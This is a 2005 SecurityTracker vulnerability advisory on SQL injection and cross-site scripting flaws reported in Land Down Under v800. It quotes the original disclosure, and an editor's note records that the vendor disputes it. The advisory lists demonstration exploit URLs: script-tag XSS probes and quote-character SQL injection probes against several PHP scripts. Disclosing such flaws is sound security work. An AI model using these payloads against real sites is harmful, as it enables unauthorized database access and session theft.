[Vendor Disputes This Report] Land Down Under Input Validation Bugs Permit SQL Injection and Cross-Site Scripting Attacks
|
SecurityTracker Alert ID: 1014747 |
SecurityTracker URL: http://securitytracker.com/id/1014747
|
CVE Reference:
CVE-2005-2674, CVE-2005-2675
(Links to External Site)
|
Updated: Jun 8 2008
|
Original Entry Date: Aug 21 2005
|
Impact:
Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 800
|
Description:
Some input validation vulnerabilities were reported in Land Down Under. A remote user can conduct cross-site scripting attacks. A remote user can also inject SQL commands.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Land Down Under software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
/ldu/index.php?c='><script>alert('test');</script> /ldu/index.php?m='><script>alert('test');</script>
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script>
The software does not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
/ldu/forums.php?m=topics&s='
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
/ldu/journal.php?m='&s=username&w=asc
/ldu/journal.php?m='&p=1
/ldu/journal.php?m='
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
/ldu/forums.php?m=topics&q=3&n='
/ldu/list.php?c=articles&s=title&w=asc&o=1&p='
/ldu/forums.php?m='&q=3&n=last
/ldu/links.php?c=links&s=title&w='
bl2k & SmallMouse reported this vulnerability.
[Editor's note: The vendor disputes this report. The vendor indicates that all specified variables are properly validated.]
|
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Land Down Under software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
[Editor's note: The vendor disputes this report and indicates that the product is not vulnerable.]
A remote user can execute SQL commands on the underlying database.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.neocrome.net/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: Bugs Land Down Under v800
|
Bugs Land Down Under v800
PHP/MySQL Website engine
Copyright Neocrome - http://www.neocrome.net
---------------------------------------------
Sql Injection and Cross Site Scripting Problem
examlple :
/ldu/forums.php?m=topics&s='
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
/ldu/journal.php?m='&s=username&w=asc
/ldu/journal.php?m='&p=1
/ldu/journal.php?m='
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
/ldu/forums.php?m=topics&q=3&n='
/ldu/list.php?c=articles&s=title&w=asc&o=1&p='
/ldu/forums.php?m='&q=3&n=last
/ldu/links.php?c=links&s=title&w='
---------------------------------------------
/ldu/index.php?c='><script>alert('test');</script>
/ldu/index.php?m='><script>alert('test');</script>
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script>
bl2k & SmallMouse
Greetz --elite-- , hurgy , Littlehackers , Cisco
www.shabgard.org
|
|